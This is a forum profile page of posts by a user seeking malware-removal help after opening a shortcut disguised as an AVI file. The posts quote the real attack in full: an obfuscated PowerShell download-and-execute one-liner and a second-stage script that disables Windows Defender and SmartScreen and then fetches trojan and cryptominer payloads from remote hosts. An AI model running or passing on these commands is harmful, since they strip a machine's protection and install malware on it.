Jump to content

redmal

Members
  • Posts

    4
  • Joined

  • Last visited

Everything posted by redmal

  1. I had some people look into it and they found this... First script creates an elevated account and downloads a batch file that downloads another script... Here's the second script: reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t REG_DWORD /d "00000000" /f reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /d "Off" /f reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "00000000" /f #$iebb = new-object -com "InternetExplorer.Application";$iebb.visible = $false;$iebb.navigate("http://pesk.icu/index.html") #(New-Object Net.WebClient).DownloadFile("https://s3.amazonaws.com/user-agreement/amazon.exe","$env:temp\sms86.exe") #start-process -FilePath "$env:temp\sms86.exe" -ArgumentList "/VERYSILENT /MON_ID=5" #start-sleep -s 8 IEX (New-Object Net.WebClient).Downloadstring("http://qgb.us/view/raw/76d115b1") #start-sleep -s 8 IEX (New-Object Net.WebClient).Downloadstring("http://qgb.us/view/raw/41cd6acf") Remove-Item –path "$env:temp\cplskt.bat" Looks like the last two IEX download a compressed EXE... First payload is Trojan:Win32/Occamy.C Second payload is a Razy Variant, which appears to be a bitcoin miner.
  2. Thanks for the help nasdaq! I ran FRST with the Fixlist.txt... Here are the results Fixlog.txt Does anyone know what the powershell script did or attempted to do?
  3. I also ran some scans and here were the results... Malwarebytes.txt FRST.txt Addition.txt
  4. I accidentally clicked a avi file that was actually a shortcut that executed a powerscript command that downloaded something, but I'm not sure what it did. This is the command and the string it downloaded. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -eXec ByP (('I'+'EX(Ne'+'w-Object '+'S'+'yst'+'em'+'.NET.WebC'+'l'+'ien'+'t).Down'+'l'+'oadstring'+'(f0ghttp:'+'//kli'+'s.icu/'+'f0'+'G)') -CrEplACE 'f0G',[cHar]39)| iex I can gather it had internet explorer download a string and execute it. I copy and pasted the string from http://klis.icu/1 here. 1.txt I immediately disconnected the internet and ran a virus scan, but nothing returned. I'm not sure what to do next. Thanks for any assistance!
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.